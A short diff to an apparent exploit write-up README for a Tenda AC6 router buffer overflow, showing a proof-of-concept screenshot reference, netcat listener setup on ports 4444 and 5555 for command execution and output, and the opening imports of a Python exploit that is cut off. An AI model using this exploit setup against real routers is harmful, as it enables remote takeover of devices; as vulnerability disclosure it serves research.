ZZ2266/.github.io/Tenda AC6 overflow/readme.md

 ![PoC 2 Result: Root Directory Listing](./imgs/2.png)

 ## exp
 Open two terminals and execute nc -l 4444 and nc -l 5555 respectively.
-One is used for executing commands, and the other for echoing commands.
+One is used for executing commands, and the other for echoing response.
 Then open a third terminal to run the exp：
 ```python
 from pwn import *
 import requests